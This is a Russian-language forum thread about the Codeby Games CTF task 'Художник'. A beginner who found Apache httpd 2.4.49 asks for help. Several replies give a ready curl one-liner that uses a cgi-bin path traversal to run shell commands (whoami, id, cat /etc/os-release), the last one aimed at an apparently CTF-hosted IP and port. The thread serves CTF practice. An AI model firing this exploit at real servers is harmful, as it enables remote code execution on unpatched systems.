Codeby Games Таск Админ Художник?

Jacob Guitarrero · 28.11.2023

Всем привет, начал свой путь в CTF и первым заданием выбрал Художник из раздела Администрирование
Пробовал в html коде искать флаг, но нет
Через nmap искал какая там уязвимость, пишет что CVE Apache httpd 2.4.49
С гитхаба скачал необходимое, но не получается
Может неправильно запускаю
Если ли есть райтап, был бы признателен

Exited3n · 28.11.2023

Jacob Guitarrero сказал(а):
Всем привет, начал свой путь в CTF и первым заданием выбрал Художник из раздела Администрирование
Пробовал в html коде искать флаг, но нет
Через nmap искал какая там уязвимость, пишет что CVE Apache httpd 2.4.49
С гитхаба скачал необходимое, но не получается
Может неправильно запускаю
Если ли есть райтап, был бы признателен

CVEшку не заюзать ?

Bash:

curl '$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh' --data 'echo Content-Type: text/plain; echo; whoami && id && cat /etc/os-release'

Jacob Guitarrero · 28.11.2023

Exited3n сказал(а):
CVEшку не заюзать ?

Bash:

curl '$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh' --data 'echo Content-Type: text/plain; echo; whoami && id && cat /etc/os-release'

это в адресную строку добавлять сайта ?
и что поизучать посоветуете, чтобы разбираться в подобных командах ?

Exited3n · 28.11.2023

Jacob Guitarrero сказал(а):
это в адресную строку добавлять сайта ?
и что поизучать посоветуете, чтобы разбираться в подобных командах ?

Честно сказать даже не знаю что посоветовать.
Основы изучи, прям с азов рекомендую начать.
Начни с того что забей в поисковик - curl и почитай про данный инструмент, что делает, как запускается и т.д.

GoBL1n · 29.11.2023

Jacob Guitarrero сказал(а):
это в адресную строку добавлять сайта ?
и что поизучать посоветуете, чтобы разбираться в подобных командах ?

судя по вопросу, найни с изучения Пингвина

P.S. надеюсь ты догодаешься загуглить за пингвина, если не понял о чём я))

Jacob Guitarrero · 29.11.2023

GoBL1n сказал(а):
судя по вопросу, найни с изучения Пингвина

P.S. надеюсь ты догодаешься загуглить за пингвина, если не понял о чём я))

самое собой изучать его, но этого не достаточно для решения данной задачи

Exited3n · 29.11.2023

Jacob Guitarrero сказал(а):
самое собой изучать его, но этого не достаточно для решения данной задачи

Серьезно ?

curl '$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh' --data 'echo Content-Type: text/plain; echo; whoami && id && cat /etc/os-release'

И так, считаем утилиты - curl, echo, whoami, id, cat
Целых 5 штук! Причем база базой.

M4x · 30.12.2024

Exited3n сказал(а):
curl '$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh' --data 'echo Content-Type: text/plain; echo; whoami && id && cat /etc/os-release'

Можно и без Content-Type:

Bash:

curl '62.173.140.174:10009/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh' --data 'echo; whoami && id && cat /etc/os-release'

Все сервисы Codeby

Поиск

Поиск

Codeby Games Таск Админ Художник?

Jacob Guitarrero

New member

Exited3n

Jacob Guitarrero

New member

Exited3n

GoBL1n

Jacob Guitarrero

New member

Exited3n

M4x